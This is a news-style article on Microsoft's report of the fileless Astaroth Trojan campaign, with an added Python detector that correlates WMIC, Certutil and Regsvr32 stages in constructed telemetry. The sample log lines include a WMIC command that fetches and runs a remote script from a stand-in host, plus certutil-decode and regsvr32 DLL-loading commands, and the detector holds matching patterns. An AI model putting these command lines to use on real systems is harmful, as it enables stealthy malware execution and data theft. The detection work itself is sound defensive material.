Yesterday, the Microsoft Defender Advanced Threat Protection (ATP) Research Team shared details of a fileless malware campaign in which attackers loaded the Astaroth Trojan directly into the memory of infected computers.
We recently unearthed a campaign that completely "lived off the land" throughout a complex attack chain that ran the info-stealing backdoor #Astaroth directly in memory. See how #MicrosoftDefenderATP next-gen protection defeated the #fileless attack: https://t.co/c2G53Ll2kf
— Microsoft Security Intelligence (@MsftSecIntel) July 8, 2019
Astaroth is a malware known for abusing living-off-the-land binaries (LOLbins) such as Windows Management Instrumentation Command-line (WMIC) to steal sensitive information including credentials, keystrokes, and other data. It sends stolen data to a remote attacker, who can misuse them to carry out financial theft or sell victim information in the cybercriminal underground.
This trojan has been public since 2017 and has affected a few European and Brazilian companies. As of now, Microsoft has not disclosed whether any other user’s machine was compromised.
What are fileless threats?
Fileless malware attacks either run the payload directly in memory or use already installed applications to carry out the attack. Because these attacks use legitimate programs, they are very difficult for most security products, and even for experienced security analysts, to detect.
Andrea Lelli, a member of Microsoft Defender ATP Research Team, thinks that though these attacks are difficult to detect, they are certainly not undetectable. “There’s no such thing as the perfect cybercrime: even fileless malware leaves a long trail of evidence that advanced detection technologies in Microsoft Defender Advanced Threat Protection (Microsoft Defender ATP) can detect and stop,” he wrote in the blog post.
How is the Astaroth Trojan attack implemented?
During a standard review, Lelli observed that telemetry was showing a sudden increase in the use of the WMIC tool to run a script. This made him suspicious of a fileless attack. Upon further investigation, he realized that the campaign was trying to run the Astaroth backdoor directly in memory.
Here’s how the initial access and execution takes place using only system tools:
- The attack begins with a spear-phishing email containing a malicious link that redirects a user to an LNK file.
- The downloaded payloads are Base64-encoded and are decoded using the Certutil tool. Two of them are decoded to plain DLL files, while the others remain encrypted.
- The Regsvr32 tool loads one of the decoded DLLs, which then decrypts and loads further files until Astaroth, the final payload, is injected into the Userinit process.
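Each stage of the chain above runs a legitimate Windows binary, so the evidence it leaves is in process-creation telemetry. The following added example (not Microsoft's code or Defender ATP's detection logic) correlates those stages per host over constructed log lines; it assumes a hypothetical pipe-separated record layout and that the WMIC script execution shows up as a command line referencing a URL or a script file.

```python
from collections import defaultdict

# Constructed process-creation records (not real telemetry):
# timestamp | host | parent image | image | command line
TELEMETRY = [
    "2019-07-01T09:00:01|ws01|explorer.exe|wmic.exe|wmic os get caption",
    "2019-07-01T09:02:10|ws02|cmd.exe|wmic.exe|wmic /format:https://example.invalid/s.xsl os get name",
    "2019-07-01T09:02:15|ws02|wmic.exe|certutil.exe|certutil -decode C:\\Users\\Public\\a.txt C:\\Users\\Public\\a.dll",
    "2019-07-01T09:02:20|ws02|wmic.exe|regsvr32.exe|regsvr32 /s C:\\Users\\Public\\a.dll",
    "2019-07-01T10:00:00|ws03|cmd.exe|certutil.exe|certutil -hashfile setup.msi SHA256",
    "2019-07-01T10:05:00|ws04|msiexec.exe|regsvr32.exe|regsvr32 /s C:\\Program Files\\Vendor\\v.dll",
]

# One entry per stage the article describes: (stage name, image, command-line test).
# The command-line tests are assumptions about how each stage appears in telemetry.
STAGES = [
    ("wmic_script", "wmic.exe",
     lambda c: "http" in c.lower() or c.lower().endswith((".xsl", ".js", ".vbs"))),
    ("certutil_decode", "certutil.exe", lambda c: "-decode" in c.lower()),
    ("regsvr32_dll", "regsvr32.exe", lambda c: c.lower().rstrip().endswith(".dll")),
]

def parse(line):
    """Split one constructed record into a dict; images are lower-cased for matching."""
    ts, host, parent, image, cmd = line.split("|", 4)
    return {"ts": ts, "host": host, "parent": parent.lower(), "image": image.lower(), "cmd": cmd}

def stage_hits(event):
    """Return the names of the chain stages a single event matches (usually zero or one)."""
    return [name for name, image, test in STAGES if event["image"] == image and test(event["cmd"])]

def find_chains(lines, min_stages=2):
    """Group stage hits per host and report hosts showing at least min_stages distinct stages.
    A lone certutil or regsvr32 event is routine; several stages on one host is the signal."""
    per_host = defaultdict(set)
    for line in lines:
        ev = parse(line)
        for name in stage_hits(ev):
            per_host[ev["host"]].add(name)
    return {host: sorted(stages) for host, stages in per_host.items() if len(stages) >= min_stages}

if __name__ == "__main__":
    for host, stages in find_chains(TELEMETRY).items():
        print(host, "->", ", ".join(stages))
```

Only ws02 is reported: the benign WMIC query on ws01, the hash check on ws03 and the vendor DLL registration on ws04 each match at most one stage.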
How does Microsoft Defender ATP detect and stop these attacks?
Microsoft Defender ATP comes with several advanced technologies to “spot and stop a wide range of attacks.” It leverages protection capabilities from the cloud including metadata-based ML engine, behavior-based ML engine, AMSI-paired ML engine, file classification engine, among others. On the client-side, it includes protection techniques such as memory scanning engine, emulation engine, network engine, and more.
Here’s a diagram depicting all the protection technologies Microsoft Defender ATP comes with:
Check out the official post by Microsoft Defender ATP Research to know more in detail.